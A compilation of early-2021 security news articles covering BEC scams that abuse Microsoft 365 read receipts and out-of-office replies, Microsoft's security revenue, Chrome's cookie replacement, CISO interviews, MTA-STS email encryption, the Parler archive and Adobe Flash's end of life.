In the read-receipts attack, a scammer creates an extortion email, and manipulates the “Disposition-Notification-To” email header to generate a read-receipt notification from Microsoft 365 to the recipient.

The malicious email itself may be trapped by email security solutions, but the read receipt is sent to the target anyway. It includes the text of the original email, and will be able to bypass traditional security solutions and land in the employee’s inbox, since it’s generated from the internal system.

An example:

“Fear-based attacks such as these are designed to elicit an urgent response from recipients to click on a malicious link, and the attackers double down on this tactic by manipulating the email headers with fear-based language,” Austin Merritt, cyber-threat intelligence analyst at Digital Shadows, told Threatpost. “If a user clicks on a link, the compromise of their device could allow an attacker to escalate privileges across an organization’s network.”

Out-of-Office Attack
In the OOO attack, a cybercriminal creates a BEC email that impersonates someone inside the organization. The attacker can manipulate the “Reply-To” email header so that if the target has an OOO message turned on, that OOO notification (which includes the original text) will be directed to another individual within the organization.

“So, the email may be sent to one employee (let’s call them John), but the “Reply-to” header contains another employee’s email address (let’s call them Tina),” explained Graham Cluley, researcher at BitDefender, in an analysis of the findings. “John has his out-of-office reply enabled, so when he receives the fraudulent email an automatic reply is generated. However, the out-of-office reply is not sent back to the true sender, but to Tina instead – and includes the extortion text.”

As with the read-receipt gambit, the message likely won’t be caught by email-security systems, because it originates from the original target’s account rather than someone external.

“This campaign demonstrates BEC actors’ ability to bypass security solutions and give email recipients the false impression that their account has been compromised,” said Merritt. “This is problematic for network defenders that already have traditional security solutions implemented because the phishing emails either trigger read receipt notifications or redirect to a separate recipient’s inbox, grabbing the attention of the intended victim.”

BEC: A Still-Serious Email Threat
BEC emails are designed to scam companies out of money. This is usually carried out by impersonating an employee, supplier or customer in an email or mobile message. The tactic usually involves asking for a bogus invoice to be paid; or for a recurring payment or wire transfer to be sent to a new, attacker-controlled destination.

The volume of BEC attacks has continued to grow, rising by 15 percent quarter-over-quarter in Q3 of 2020, according to Abnormal Security’s Quarterly BEC Report [PDF]. The average weekly volume of BEC attacks in the time period increased in six out of eight industries, with the biggest rise observed in the energy/infrastructure sector, at 93 percent. The industries which had the highest number of weekly BEC attacks were retail/consumer goods and manufacturing and technology.

Those campaigns geared towards invoice and payment fraud were particularly virulent, with a 155 percent QoQ, the study found.

The traditional defense for these kinds of attacks – user awareness and training to independently verify that a request is legitimate – becomes more difficult with a distributed footprint, researchers noted.

“Remote work has created more opportunity to execute BEC and other phishing attacks,” Hank Schless, senior manager of security solutions at Lookout, told Threatpost. “Without being able to walk over to another person’s desk in the office, employees will have a much harder time validating unknown texts or emails. Threat actors have taken note of these issues and are using remote work to their advantage to execute bigger BEC attacks.”

Also, as email-security systems get smarter, so are the cybercriminals. For instance, earlier in January a campaign was spotted that leverages Google’s Forms survey tool to prompt an ongoing dialogue between the email recipient and the attacker – setting them up as a victim for a future BEC trap, researchers said.

And Microsoft’s Office 365 in particular, which is the computing giant’s cloud-based Office suite, is an especially attractive avenue for BEC efforts, analysts have observed.

Microsoft and Office 365: A Ripe Target
“While Office 365 provides the distributed workforce with a primary domain to conduct business, it also creates a central repository of data and information that’s a prime target for attackers to exploit,” Chris Morales, head of security analytics at Vectra, told Threatpost. “Rather than leveraging malware, attackers are using the existing tools and capabilities already present in Office 365, living off the land to stay hidden for months.”

After attackers gain a foothold in an Office 365 environment, it’s easy for BEC scammers to leverage a trusted communication channel (i.e. sending an illegitimate email from the CEO’s official account, used to socially engineer employees, customers or partners). But there are several common bad outcomes, beyond mounting BEC attacks, he added.

These include the ability to search through emails, chat histories and files looking for passwords or other interesting data; setting up forwarding rules to obtain access to a steady stream of email without needing to sign in again; planting malware or malicious links in documents that many people trust and use, again manipulating trust to circumvent prevention controls that may trigger warnings; and stealing or holding files and data for ransom.

“The importance of keeping a watchful eye on the misuse of user access cannot be overstated given its prevalence in real-world attacks,” Morales said. “In the current cybersecurity landscape, security measures like multi-factor authentication (MFA) are no longer enough to deter attackers. SaaS platforms like Office 365 are a safe haven for attacker lateral movement, making it paramount to focus on user access to accounts and services. When security teams have solid information and expectations about SaaS platforms such as Office 365, malicious behaviors and privilege abuse are much easier to quickly identify and mitigate.”


For Microsoft, Security is a $10 Billion Business

29.1.2021  Security  Securityweek

NEWS ANALYSIS: Microsoft generated a whopping $10 billion in security-related revenues in just the last 12 months and is now positioned as an enterprise cybersecurity powerhouse.

Microsoft’s decades-long transformation from an embarrassment to a legitimate powerhouse in cybersecurity is showing significant financial returns: more than $10 billion in security-related revenues in just the last 12 months.

The $10 billion figure, deliberately broken out during Microsoft CEO Satya Nadella’s last earnings call (transcript), comes from what Redmond describes as “advanced security and compliance offerings” sold to hundreds of thousands of corporate customers.

The products and services sold include Microsoft’s Azure Active Directory, Intune, Microsoft Defender for Endpoint, Office 365, Microsoft Cloud App Security, Microsoft Information and Governance, Azure Sentinel, Azure Monitoring, and Azure Information Protection.

Nadella was downright boastful about the company’s performance -- and ambition -- in the lucrative cybersecurity business. “This [$10 billion-a-year] milestone is a testament to the deep trust organizations place in us and we will continue to invest in new capabilities across all our products and services to protect our customers,” Nadella said.

For business analysts and industry watchers, the windfall is final confirmation that Microsoft has figured out its place as a prominent security vendor after multiple hits-and-misses over the years.

“Ten billion dollars in revenue with 400,000 customers cements the vendor as a cybersecurity behemoth, without a doubt,” Forrester analysts Jeff Pollard and Joseph Blankenship wrote in a research note.

“As more and more businesses move to cloud, the idea of rationalizing the number of vendors they work with and simplifying security continues to appeal to CISOs, CIOs, and CFOs alike. Fears of “lock in” are disregarded in favor of “good enough” and “integrated.”

“With offerings spanning everything from the operating system to the cloud -- and everything in between, it seems -- Microsoft has achieved its goal of being a mega-security vendor,” the Forrester analysts said.

The results are also an ominous sign for startups and entrepreneurs selling security bolt-ons atop Microsoft’s OS and cloud offerings. “This makes [Microsoft] an existential threat for many companies, especially if they compete in the security analytics, endpoint, identity, and email security markets,” Pollard and Blankenship wrote.

For many years, Microsoft struggled to figure out its place in the anti-malware market, investing heavily in a range of consumer paid suites (remember Windows Live OneCare?) before settling on the strategy of bundling Windows Defender into the operating system and cloud services.

The company also doubled down on its investments in security and risk management and found instant success with the Microsoft Azure Sentinel product, a product that falls neatly within the security information event management (SIEM) and security orchestration automated response (SOAR) categories.

“What we have built is very helpful in times of crisis and there is a big crisis right now,” Nadella said in a Yahoo Finance interview. “But you need to sort of obviously build all of this over a period of years if not decades and then sustain it through not just product innovation, but also I would say, practice every day.”

As businesses speed up digital transformation plans, Microsoft now sits in an enviable position of being able to sell hybrid and cloud offerings and then sell “advanced security and compliance offerings” to those enterprise licensees.

With hundreds of millions of Windows users globally generating data and telemetry to beef up its security capabilities, Microsoft is set up to cash in even more. The company processes 30 billion+ authentications daily across Azure AD’s 425 million users and boasts that it analyzes upwards of eight trillion security signals across its platforms and services.


Google Says Chrome Cookie Replacement Plan Making Progress
27.1.2021 
Security  Securityweek

Google says it’s making progress on plans to revamp Chrome user tracking technology aimed at improving privacy even as it faces challenges from regulators and officials.

The company gave an update Monday on its work to remove from its Chrome browser so-called third-party cookies, which are used by a website’s advertisers or partners and can be used to track a user’s internet browsing habits.

Third-party cookies been a longtime source of privacy concerns and Google said a year ago that it would do away with them, in an announcement that shook up the online advertising industry.

The changes will affect Chrome, the world’s dominant web browser, as well as other browsers based on Google’s Chromium technology such as Microsoft’s Edge. Rival browsers Safari and Mozilla Firefox have already removed third-party cookies by default but Google is taking a more gradual approach.

In a blog post, Google’s group product manager for user trust and privacy, Chetna Bindra, sought to ease fears about the project, saying the proposals will “help publishers and advertisers succeed while also protecting people’s privacy as they move across the web.”

Google said it was releasing new data on one proposed technology, which does away with “individual identifiers” and instead groups users into large demographic flocks.

The technique hides individual users in the online crowd and keeps a person’s web history private on a device’s browser. Tests results showed it can be an effective replacement for third party cookies, and advertisers can expect to see “at least 95% of the conversions per dollar spent when compared to cookie-based advertising,” Bindra said.

Conversions are actions users take when they see an ad, such as clicking to make a purchase or watch a video. Advertisers will be able to test out the system for themselves in the coming months.

Marketers for an Open Web, a U.K. industry lobbying group, said Google’s announcement did nothing to ease concerns voiced by the ad industry and regulators and questioned whether the company’s data showed what it claimed.

Google’s plan has drawn scrutiny from Britain’s competition watchdog, which this month opened an investigation into whether it could undermine online ad competition and entrench Google’s dominant position in the digital advertising industry.

U.S. officials are also challenging Google’s behavior. A group of states filed a lawsuit against the company last month accusing it of “anti-competitive conduct” in the online ad industry.


CISO Conversations: Intel, Cisco Security Chiefs Discuss the Making of a Great CISO
27.1.2021 
Security  Securityweek

CISO Interviews: Intel's Brent Conran and Cisco's Chris Leach

In this installment of SecurityWeek’s CISO Conversations series, we talk to two veteran security leaders in the technology sector: Brent Conran, CISO at Intel Corp., and Chris Leach, Senior CISO Advisor at Cisco Systems. The purpose, as always in this series, is to understand what makes a successful modern CISO.

Organizational hierarchy

The enduring question for many CISOs is where their role fits best in the organizational hierarchy. It’s an important question. Reporting to the CIO or CEO can be problematic because they have different priorities. Reporting to the CFO, Legal or Audit can be problematic because they don’t usually understand the nitty gritty, down-in-the-weeds function of cybersecurity.

Nearly every CISO has a personal view on the question, usually with some slight variation from others, depending on their own experiences. Brent Conran from Intel has a dramatically different view from most. “Well, I work for myself,” he said. He doesn’t mean it in the normal legal sense. He means it in the psycho-emotional sense. “Once you’ve got that part of the equation figured out – that you’re a going concern in your own right – where you report to doesn’t much matter.”

But he admits it’s a vexed question. He’s been attending the RSAC Executive Security Action Forum each year for the last ten years. “They’ve asked that question every year. Ten years ago, 95% of CISOs reported to the CIO. Today, it’s probably about 55%, with the rest reporting to a range of offices.”

He thinks the solution depends upon a range of factors: the industry you’re in, what you want to achieve as a CISO, the relationships you have. “If you have a good relationship with the CIO, there’s often a lot of benefit in reporting to the CIO. But if you need a lot of independence to do what’s necessary as a CISO, then maybe you shouldn’t report to the CIO.”

Cisco’s Chris Leach is in broad agreement. “When I first started as a CISO, some 20 years ago, I reported to the CIO – and that made sense. But as the CISO role and accountability have evolved, so the reporting structure needs to change as well. Whoever controls the security budget controls the security – and the CIO has different priorities.” CIOs want smooth computing; CISOs want secure computing – and the two concepts are not always fully compatible.

But that leaves a problem, because other officers tend not to have a close understanding of security. “The best reporting relationship I’ve had has been with a COO. The worst was with a CFO – I don’t think CFOs really understand the issues. But in both cases, it was ultimately down to the personal relationships. I don’t think there’s an ideal place until you understand the individuals and the company concerned. But I can tell you this,” he added: “you should never report solely to a CIO. Maybe dual-reporting with somebody else.”

All of this begs some interesting questions: what can a CISO who wants to shine do if the reporting structure prevents it? Well, this is where Conran’s initial comment comes in to play. By ‘working for yourself’, he effectively means it is your life, your career, so take responsibility for it.

“A CISO has to be able to effect change,” he said, “and if you’re in a position where you cannot effect change, do something.” He gave a hypothetical example. If you report to the CFO and it isn’t working, there has to be other C-Suite officers you can talk to.”

Leach takes a very similar view. “If you’re not getting through to the company and you’re having a reporting issue, I would talk to internal audit.” If the problem is reporting to the CIO, Leach doesn’t suggest bypassing the CIO and taking the complaint straight to the board, or even trying to exclude the CIO.

“But I would begin with audit,” he said. “Get their view and see if they’ve had any discussions around this topic with the audit committee and/or the board. Audit understands conflicts of interest. As CISOs, we tend to beat up audit, but audit can be your best friend as well.”

The second question raised by the reporting structure is ‘compliance’. Compliance cannot be ignored. It’s either the law (like CCPA and GDPR) or club rules that must be obeyed (like PCI). The main issues, however, are where should compliance live within the company, and who should own it.

Compliance

“There’s nothing wrong with requiring compliance with standards per se,” said Leach. “The problem is that there are so many of them. Any single company will likely need to comply with multiple different state privacy regulations, multiple international privacy regulations, national and international finance regulations, PCI and more. There is no single audit that confirms compliance with all of them – and maintaining separate and consistent compliance is a burden.”

But compliance is also a problem for the organizational structure of the company. “Take GDPR,” he said. “My argument is that privacy is a component of security. But we’re seeing a divergence of privacy and security with privacy going to the legal department. But the lawyers don’t do operations – they don’t understand 24/7 tickets and all those sorts of things we deal with.” So, privacy is taken away from security, but comes back to security to be handled.

“I’ve seen some companies that have a whole separate compliance department,” he continued. “That department does what it has to do, that’s good – but they always have to come back to security for answers or to make any necessary changes. Security is always central to the functioning of compliance. So should compliance be under security and help security, or should it be on a level and make demands on security. I don’t know the answer to that.”

Advice

Further insight into what Conran means by taking responsibility for your career comes from both the best advice he has ever received, and the advice he would give to new or prospective CISOs. The best advice came from his father. “Always work yourself out of a job, and you will always have a job.”

He has applied this in different ways at different times. He always looks for people who are constantly seeking to improve their position. He mentors and prepares them. “So, there’s one, two, or three people always ready to take my job - if necessary. But that means that if something bigger or better comes along for me, I can just take it without worrying about my current company. Or if my world suddenly changes, like mainframes get dropped and we move to client/server, or office working gets dropped in favor of remote working, I’ve already worked myself and the company into a position of being able to handle it. Work yourself out of a job, and you’ll always be in one.”

Leach’s best advice is different, but still related to taking responsibility. “The best advice I ever had was simple: never be afraid to vote with your feet.” He expanded on this. “If, as a CISO, you continually raise a hand to escalate issues – and assuming the reporting is to a CIO who has different priorities and ignores you – what can you do? If there is a subsequent breach, it is the CISO who bears the mark of that breach on his CV, forever. What can you do? For me, if I can’t get anything done, or I’m having roadblocks because of a bad reporting relationship, I would leave. And incidentally, I did leave... I did leave one company where I worked for that very reason – because I couldn’t get anything done because the CIO blocked everything I did.”

The advice that Conran would give to newcomers is again related to his central theme of taking responsibility. “What I tell everyone,” he said, “is that you must continuously and constantly learn – and if you do that, you’ll be successful. I get a lot of people who come to me and say, ‘I’m top of class with 99% right.’ I tell them that means you’re 1% wrong, and it might be that 1% that gets you. If you have the personality and aptitude to continue learning, you’ll thrive. If 99% right is all you want, that’s OK, but we’ll find somewhere else for you.”

Leach would simply recycle the advice he received: don’t be afraid to vote with your feet. It implies more than seems obvious. If the CISO is going to take the blame for a failure, he needs to be given the authority to prevent it. Without that authority, for the sake of your career, it might be better to move on.

Personal attributes

At this point it is worth asking what it takes to be a top CISO. Conran has little doubt. “Agility,” he said, “and the self-confidence to use that agility. Look,” he continued, “we might be doing something one day, and the world suddenly changes under our feet.” Like the pandemic forcing an almost overnight switch from office working to home working. “We have to be able to pivot, and we have to be able to pivot today.”

Or there might be a sudden and major incident. “A CISO must be able to talk at all levels – like from 40,000 feet and 20,000 feet, and sometimes right down to the ones and zeros – while keeping your hat on straight,” he said. “The agility to interact with all levels of that stack simultaneously is imperative to being successful.”

There’s a related attribute: the ability to understand the business. “Security used to have a technical relationship to the business,” he said. “Discussions mostly came down to ‘yes’ and ‘no’ – mostly ‘no’. That doesn’t work anymore. The CISO must be able to sit down with business in a consultative manner, and say, ‘I understand where you’re trying to go – let me explain the best way to get there. ‘No’ must become ‘Yes, but like this’.”

Asked outright whether the CISO needs to be a businessman or a techie, he replied, “I don’t understand the question. I don’t know how a CISO can do his job if he doesn’t understand technology, and I don’t know how he can do his job if he doesn’t understand the business. An understanding of both is part and parcel of being a CISO.”

Leach has a slightly different emphasis. “It’s more important to be a businessman,” he said. “I’ve been saying this for 20 years. If you think about being a CISO, it’s like being a general in a big battle. You’ve only got a certain number of troops and a certain amount of resources. How can that work if you don’t know where it is most important to deploy them?”

He gave the example of a Fortune 50 company. He asked the CIO, what were the company crown jewels that needed to be protected. The answer wasn’t this data, or that server or some intellectual property – it was the customers. The CEO gave exactly the same answer. “But if I went to Coca Cola and I asked the same question, I might be told their recipe or something like that. All businesses are unique. But if I don’t understand what each business is trying to achieve – what it’s best at – then I don’t know how I do my job. And most CISOs forget to ask the question.”

Conran adds two other attributes that will benefit the modern CISO. The first is a thick skin. “I cannot make a decision,” he said, “that does not upset a portion of my workforce. Whatever I do, I’m either turning something on or turning something off. Whichever it is, it will mean change, and people simply aren’t wired for change – but you’ve just got to keep your mind focused on the goal.”

The second attribute is a desire to learn. “I read for hours in the morning and hours at night – technical whitepapers, industry trends and developing themes. If you move to a new platform or different piece of technology, you must make the time to thoroughly understand it. Security is like a journey where you’ll never reach the destination. The good news is that you’re never going to finish learning about your job. The bad news is that you’re never going to finish learning about your job. You just have to keep up.”

Future threats

With an understanding of what it takes to be a top CISO, it is worth asking where the future threats are likely to originate. Conran breaks it into tactical threats (immediate term), and strategic threats (longer term).

“The tactical answer is ransomware and commodity malware. Ransomware is happening across the globe. It’s destructive and a huge problem, threatening trust in the internet. Security builds confidence in the internet. If people were to lose their confidence and no longer trust their bank or online retail shops, then rebuilding trust is something we’re going to have to work on.”

For the longer term, he has a different concern. “If you look into the future, but not so far out, I think Quantum is going to be massive for this sector – and for the Internet. None of our encryption algorithms will work once we have Quantum. None of our security products will work once we have Quantum. And, whoever finally gets there first is going to throw this industry up in the air. We’ll have to work through that pretty quickly to ensure we maintain the integrity of our data and transactions.”

Summing up, he said, “Tactically, it’s going to be ransomware and commodity malware that’s the problem. More strategically but within the foreseeable future, I think quantum computing is going to be very disruptive to the existing security products and standards that we have today.”

Leach is as much concerned about security’s response to threats as to the precise type of threat faced. “I think the biggest problem is that innovation from the attackers is accelerating, and we are not. We cannot continue to do what we are doing – we have a cycle of a 3- to 5-year plan and strategy. If we don’t shorten this, if we don’t go faster, we are in danger of becoming obsolete as individuals. That’s not the role of CISO, but the existing crop of CISOs.”

But there is another problem that stems from within, especially in the technology sector. “There’s an overwhelming number of security product vendors out there. Our constant chasing after the latest shiny object really detracts us from just getting the job done. It’s a difficult issue because we all quite rightly look for new emerging technologies, but there’s so many of them. I cannot operate a bunch of single-purpose solutions in my organization – I don’t have enough people, I don’t have enough budget, and I don’t have enough time. We need to start looking at the interconnectivity of devices, vendors, and what I really think of as a fabric. We need a better integrated security fabric.”

It’s a question of communication between devices. “Take the SIEM,” he said, “which was supposed to solve so many problems. You add a new process, or whatever, and suddenly, you’re re-baselining all over again. So, my SIEM, which was bought to be a problem solver, becomes a millstone around my neck.” The problem, he suggests, is that the vendors are not working together.

His third concern is that security needs to become more resilient. By this he means more than just recovery – for Leach, resiliency involves the anticipation of problems so that they can be avoided or better recovered from. “Resiliency is more than just recovery,” he said. “When we talk about resiliency, people often think it’s just recovery from backups. But no. We need to anticipate failures. The attacks are becoming better, stronger and more specific. We need to be in a position to anticipate and prepare for what the next attacks are going to be like.”

Between them, Intel’s Brent Conran and Cisco’s Chris Leach have painted a picture of the major threats to expect over the next few years, and best practices on how to handle them.


Enhancing Email Security with MTA-STS and SMTP TLS Reporting
26.1.2021 
Security  Thehackernews
email security
In 1982, when SMTP was first specified, it did not contain any mechanism for providing security at the transport level to secure communications between mail transfer agents.

Later, in 1999, the STARTTLS command was added to SMTP that in turn supported the encryption of emails in between the servers, providing the ability to convert a non-secure connection into a secure one that is encrypted using TLS protocol.

However, encryption is optional in SMTP, which implies that emails can be sent in plaintext. Mail Transfer Agent-Strict Transport Security (MTA-STS) is a relatively new standard that enables mail service providers the ability to enforce Transport Layer Security (TLS) to secure SMTP connections and to specify whether the sending SMTP servers should refuse to deliver emails to MX hosts that that does not offer TLS with a reliable server certificate. It has been proven to successfully mitigate TLS downgrade attacks and Man-in-the-Middle (MitM) attacks.

SMTP TLS Reporting (TLS-RPT) is a standard that enables reporting issues in TLS connectivity experienced by applications that send emails and detect misconfigurations. It enables the reporting of email delivery issues that take place when an email isn't encrypted with TLS. In September 2018, the standard was first documented in RFC 8460.

Why Do Your Emails Require Encryption in Transit?
The primary goal is to improve transport-level security during SMTP communication, ensuring the privacy of email traffic. Moreover, encryption of inbound messages addressed to your domain enhances information security, using cryptography to safeguard electronic information.

Furthermore, man-in-the-middle attacks (MITM) like SMTP Downgrade and DNS spoofing attacks, have been gaining popularity in recent times and have become a common practice among cybercriminals, which can be evaded by enforcing TLS encryption and extending support to secure protocols.

How Is a MITM Attack Launched?
Since encryption had to be retrofitted into SMTP protocol, the upgrade for encrypted delivery has to rely on a STARTTLS command. A MITM attacker can easily exploit this feature by performing an SMTP downgrade attack on the SMTP connection by tampering with the upgrade command by replacing or deleting it, forcing the client to fall back to sending the email in plaintext.

After intercepting the communication a MITM attacker can easily steal the decrypted information and access the content of the email. This is because SMTP being the industry standard for mail transfer uses opportunistic encryption, which implies that encryption is optional and emails can still be delivered in cleartext.

MITM attacks can also be launched in the form of a DNS Spoofing Attack:

As DNS is an unencrypted system, a cybercriminal can replace the MX records in the DNS query response with a mail server that they have access to and are in control of, thereby easily diverting the DNS traffic flowing through the network.

The mail transfer agent, in that case, delivers the email to the server of the attacker, enabling him to access and tamper with the email content. The email can be subsequently forwarded to the intended recipient's server without being detected.

When you deploy MTA-STS, the MX addresses are fetched over DNS and compared to those found in the MTA-STS policy file, which is served over an HTTPS secured connection, thereby mitigating DNS spoofing attacks.

Apart from enhancing information security and mitigating pervasive monitoring attacks, encrypting messages in transit also solves multiple SMTP security problems.

Achieving Enforced TLS Encryption of Emails with MTA-STS
If you fail to transport your emails over a secure connection, your data could be compromised or even modified and tampered with by a cyber attacker.

Here is where MTA-STS steps in and fixes this issue, enabling safe transit for your emails as well as successfully mitigating cryptographic attacks and enhancing information security by enforcing TLS encryption.

Simply put,MTA-STS enforces the transfer of emails over a TLS encrypted pathway. In case an encrypted connection cannot be established, the email is not delivered at all, instead of being delivered in cleartext.

Furthermore, MTAs fetch and store MTA-STS policy files, which securely serve the MX addresses making it more difficult for attackers to launch a DNS spoofing attack.

Email security
MTA-STS offers protection against :

Downgrade attacks
Man-In-The-Middle (MITM) attacks
It solves multiple SMTP security problems, including expired TLS certificates and lack of support for secure protocols.
DNS Spoofing attacks
Major mail service providers, such as Microsoft, Oath, and Google, support MTA-STS. Google, being the largest industry player, attains center-stage when adopting any protocol, and the adoption of MTA-STS by google indicates the extension of support towards secure protocols and highlights the importance of email encryption in transit.

Troubleshooting Issues in Email Delivery with TLS-RPT
SMTP TLS Reporting provides domain owners with diagnostic reports (in JSON file format) with elaborate details on emails addressed to your domain and are facing delivery issues, or couldn't be delivered due to a downgrade attack or other issues, so that you can fix the problem proactively.

As soon as you enable TLS-RPT, acquiescent Mail Transfer Agents will begin sending diagnostic reports regarding email delivery issues between communicating servers to the designated email domain.

The reports are typically sent once a day, covering and conveying the MTA-STS policies observed by senders, traffic statistics as well as information on failure or issues in email delivery.

Email security
The need for deploying TLS-RPT :

In case an email fails to be sent to your domain due to any issue in delivery, you will get notified.
TLS-RPT provides enhanced visibility on all your email channels so that you gain better insight on all that is going on in your domain, including messages that are failing to be delivered.
TLS-RPT provides in-depth diagnostic reports that enable you to identify and get to the root of the email delivery issue and fix it without any delay.
Adopting MTA-STS and TLS-RPT Made Easy and Speedy by PowerDMARC
MTA-STS requires an HTTPS-enabled web server with a valid certificate, DNS records, and constant maintenance. PowerDMARC makes your life a whole lot easier by handling all of that for you, completely in the background- from generating certificates and MTA-STS policy files to policy enforcement, we help you evade the complexities involved in adopting the protocol. Once we help you set it up with just a few clicks, you never even have to think about it again.

With the help of PowerDMARC's Email Authentication Services, you can deploy Hosted MTA-STS at your organization without the hassle and at a very speedy pace, with the help of which you can enforce emails to be sent to your domain over a TLS encrypted connection, thereby making your connection secure and keeping MITM attacks at bay.

PowerDMARC makes your life easier by making the process of implementation of TLS-RPT easy and speedy, at your fingertips! As soon as you sign up with PowerDMARC and enable SMTP TLS Reporting for your domain, we take the pain of converting the complicated JSON files containing your reports of email delivery issues, into simple, readable documents (per result and per sending source), that you can go through and understand with ease! PowerDMARC's platform automatically detects and subsequently conveys the issues you are facing in email delivery, so that you can promptly address and resolve them in no time!

PowerDMARC is a single email authentication SaaS platform that combines all email authentication best practices such as DMARC, SPF, DKIM, BIMI, MTA-STS and TLS-RPT, under the same roof. So sign up to get your free DMARC Analyzer today!


Researcher Builds Parler Archive Amid Amazon Suspension

12.1.2021  Security  Threatpost
A researcher scraped and archived public Parler posts before the conservative social networking service was taken down by Amazon, Apple and Google.

A security researcher said she has scraped and is archiving 99 percent of Parler’s public posts, as the social-media network goes offline following suspensions from Amazon, Apple and Google.

Archived content includes public posts from the social-media site. These posts reportedly included Parler video URLs made up of raw video files with associated embedded metadata – and precise GPS coordinates of where the videos were taken, sparking privacy concerns about the service’s data collection.

The researcher behind the archival effort, who goes by @donk_enby on Twitter, told Threatpost that no private information was disclosed as part of the effort – all archived posts were already publicly available via the web.

2020 Reader Survey: Share Your Feedback to Help Us Improve

Parler, which launched in 2018 and markets itself as a “free speech social network,” has a significant user base of supporters of Donald Trump, conservatives and right-wing extremists. As of November, the site had 10 million total users.

The Jan. 6 storming of the U.S. Capitol building led to several U.S. tech giants cracking down on the service, including Apple and Google banning the app from their respective app marketplaces. That’s because several organizations, including the Atlantic Council, have called out Parler for not moderating its “town square,” allowing users to publicizing the protest for weeks.

Meanwhile, Amazon reportedly informed Parler it was removing it from its web hosting service on Sunday night, essentially stripping it of the infrastructure it relies on to operate. Parler for its part on Monday filed a complaint against Amazon, alleging that it was kicked off for political and anti-competitive reasons.

On the heels of the Capitol riot, @donk_enby on Jan. 6 began to archive the posts. With Sunday’s news of Amazon stripping Parler from its web hosting service, she ramped up her efforts, saying on Twitter she was crawling 1.1 million Parler video URLs and calling for others to join in on the effort.

Contrary to various reports circulating on Reddit and other internet forums, there is no evidence that Parler was actually hacked; according to reports, @donk_enby was able to reverse-engineer the Parler iOS app, in order to discover a web address that the application uses internally to retrieve data.

This scraped data is slowly being fed into the Internet Archive (archive.org), a non-profit digital library of internet websites, @donk_enby told Threatpost. While no public data is currently available, “things will be available in a more accessible form later,” tweeted @donk_enby.

She said on Twitter that the effort was akin to “a bunch of people running into a burning building trying to grab as many things as we can” and “people can do whatever they want with it.” As of Jan. 10, she estimated the total size of scraped data to be around 80 terabytes.

On Monday, @donk_enby dispelled rumors posted on Reddit forums that said that private data had been scraped as part of the archival effort, reiterating that only content publicly available via the web is being archived. Data such as email addresses, phone numbers, private messages or credit-card numbers were not affected (unless they were publicly posted), she said.

However, that public data – including the GPS coordinates from the image metadata – could pose a privacy concern when it comes to what Parler was collecting from its users. Previously, the service has come under fire for asking users for their Social Security numbers and photo-ID images in order to become a verified account on the platform.

Chris Vickery, director of cyber risk research with UpGuard, told Threatpost many services remove this metadata when images and videos are uploaded to their site. Because Parler kept this metadata in, it reveals data attached to user phones, including GPS coordinates or phone models.

“Parler was not a bastion of security,” he told Threatpost.

Threatpost has reached out to Parler for further commentary and has not yet heard back.

“There might be legal impact for particular Parler users, but there’s also an increased privacy and security risk,” security professional John Opdenakker told Threatpost. “Because of the location data and other (meta) data that now becomes easily retrievable about Parler users, it’s simple to identify, locate them and reconstruct their whereabouts. This particular information could also be abused, for instance in online attacks against Parler users.”

Overall, Opdenakker stressed the incident is an important reminder that everything people put on the internet stays on the internet – even when a service is shut down.

“The fact that you no longer see particular content online doesn’t mean per se that the data is effectively deleted,” Opdenakker told Threatpost.


Today Adobe Flash Player reached the end of life (EOL)
2.1.2021 
Security  Securityaffairs

Today Adobe Flash Player has reached its end of life (EOL), its vulnerabilities were exploited by multiple threat actors in attacks in the wild over the years.
Adobe Flash Player has reached the end of life (EOL) today, over the years, threat actors have exploited multiple vulnerabilities in the popular software.

Adobe will no longer release updates for its Flash Player and web browsers will not offer the support for the Adobe Flash Plugin.
“Since Adobe will no longer be supporting Flash Player after December 31, 2020 and Adobe will block Flash content from running in Flash Player beginning January 12, 2021, Adobe strongly recommends all users immediately uninstall Flash Player to help protect their systems.” states the announcement published by Adobe. “Some users may continue to see reminders from Adobe to uninstall Flash Player from their system. See below for more details on how to uninstall Flash Player.”

In July 2017, Apple, Facebook, Google, Microsoft, and Mozilla, and Adobe announced the end of the support for Flash Media Player by the end of 2020.

The software was considered not secure and new software with better performance, such as HTML5, is used by web developers for their projects.

In the past days, Adobe started displaying alerts on Windows systems urging its users to “immediately” remove Flash Player from their systems.

Starting from today it will not possible to download the Adobe software. Experts recommend avoiding to download the software from third-party websites.

To remove Flash Player from your computer click “Uninstall” when prompted by Adobe in Flash Player.

Microsoft released the KB4577586 optional update to remove Windows ActiveX versions of Flash Player.

Microsoft will also remove all Flash-related downloadable resources from all its download platforms after Flash reaches its end of life tomorrow.